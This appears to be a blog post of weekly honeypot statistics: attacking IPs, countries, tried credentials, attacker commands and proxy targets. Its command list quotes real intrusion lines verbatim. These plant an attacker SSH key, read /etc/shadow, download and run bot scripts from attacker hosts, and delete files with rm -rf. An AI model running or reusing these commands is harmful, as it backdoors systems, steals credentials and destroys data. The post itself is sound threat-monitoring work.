Compared to the last couple of weeks the Honey Pot has experienced an increase number of attack across some areas, with over 1000 extra attacking IP’s, 500+ new login combinations and 260 new command line requests
Total attacking IPs: 2601
Total Countries: 82
Total User/pass successful combos: 2039
Total Commands ran: 1260
Total TCP Forward requests: 15777
TOP 30 Attacking IP’s
Looking at the Top attacking IP with an impressive 42,336 requests to the honey pot (7x the requests of Position 2). This is a box over at Digital Ocean
geoiplookup 188.166.89.44
GeoIP Country Edition: NL, Netherlands
GeoIP City Edition, Rev 1: NL, 07, Noord-Holland, Amsterdam, 1098, 52.352901, 4.941500, 0, 0
GeoIP ASNum Edition: AS14061 DigitalOcean, LLC
This is the same box that has been dominating Position number for for a few weeks.
42336 188.166.89.44
6107 45.227.255.206
5819 45.227.255.162
5613 5.188.86.221
5488 5.188.86.168
5434 5.188.86.165
5287 5.188.86.169
5196 5.188.86.207
5083 5.188.86.210
5017 45.227.255.207
4988 5.188.86.178
4962 5.188.86.206
4855 5.188.86.216
4801 5.188.87.57
4689 5.188.86.167
4671 5.188.87.58
4617 5.188.87.53
4443 5.188.86.212
4432 5.188.87.49
4037 5.188.87.51
3942 5.188.87.60
3242 61.130.28.203
2472 45.227.255.161
1981 5.188.86.180
1498 185.232.67.36
1232 54.36.165.34
1164 5.182.39.63
1036 78.128.113.157
1016 5.182.39.64
888 5.157.16.74
Countries of Orgin
It is no surprise with China still in the number Position with 944 unique IP addresses which is 1/3 of the total number of IP’s hitting the server. The United States is the second-highest country to be hitting the server. Compared to the previous weeks China’s attacks have doubled in number.
944 China
401 United States
158 France
96 Singapore
96 Germany
82 India
76 Brazil
69 South Korea
67 Russia
46 Canada
45 Netherlands
44 United Kingdom
39 Indonesia
32 Hong Kong
30 Vietnam
27 Colombia
21 Poland
20 Ireland
17 Italy
17 Panama
16 Japan
15 Romania
15 Mexico
14 Argentina
14 Malaysia
11 Sweden
11 Thailand
10 Spain
9 Iran
8 Taiwan
Username and password combos
There is no real change with these statistics with root/admin still being the top number of requests coming into the server.
112556 root/admin
217 root/1234
142 root/root
49 root/123456
46 root/test
41 root/music
36 root/password
34 root/1234567890
34 root/tequiero
31 root/123
TOP 30 Commands
There has been a few new commands that have shown up on the list of commands ran. I have attempted to view the source code of the .sh scripts they are attempting to load into the server however they are no longer online at the time of my writing this.
2063 uname -a;nproc
1496 uname -a
1213 cat /proc/cpuinfo | grep name | wc -l
1209 cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
1208 free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
1208 which ls
1208 ls -lh $(which ls)
1205 crontab -l
1204 w
1202 uname -m
1201 cat /proc/cpuinfo | grep model | grep name | wc -l
1200 uname
1200 top
1197 lscpu | grep Model
1188 cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
403 nproc
265 uname -s -v -n -r
177 echo -e “\x6F\x6B”
115 uname -a;php -v;
80 wget http://198.23.209.128/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 198.23.209.128 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 198.23.209.128; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf *
61 uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys;wget -qO – http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
21 cat /etc/issue
13 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.77/pwnInfect.sh; curl -O http://45.14.224.77/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 45.14.224.77 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 45.14.224.77; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.77 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
9 echo “321” > /var/tmp/.var03522123
9 rm -rf /var/tmp/.var03522123
9 cd /tmp || cd /run || cd /; wget http://104.168.195.213/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.195.213 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.195.213; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
9 cat /var/tmp/.var03522123 | head -n 1
8 rm -rf Astra.x86; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86 8 rm -rf /var/tmp/dota
6 /bin/eyshcjdmzg
TOP 30 TCP Forward Requests
Still ya.ru is the main target of TCP Forward requests. The requests for ya.ru is coming from 5.188.86.0/24 network, This is the botnet i reported on previously from Ireland, The second highest website is wallmart.com
85430 ya.ru:80
8908 www.walmart.com:443
6466 www.evernote.com:443
5655 oauth.vk.com:443
4809 www.amazon.com:443
3748 69.195.128.18:80
3738 api.sendspace.com:443
3423 www.google.com:443
3196 soundcloud.com:443
2560 96.43.128.70:80
2153 ip.bablosoft.com:80
1719 youtube.com:443
1583 34.107.165.220:443
1540 sso.verizonenterprise.com:443
1390 iforgot.apple.com:443
1326 151.101.65.35:443
1229 authserver.mojang.com:443
1227 151.101.129.35:443
1173 151.101.1.35:443
1146 omegle.com:80
1097 151.101.193.35:443
1072 api.ipify.org:443
1066 172.217.23.164:443
1036 vk.com:443
1016 work.a-poster.info:25000
1001 s.youtube.com:443
962 www.instagram.com:443
960 idmsa.apple.com:443
846 appleid.apple.com:443
762 aj-https.my.com:443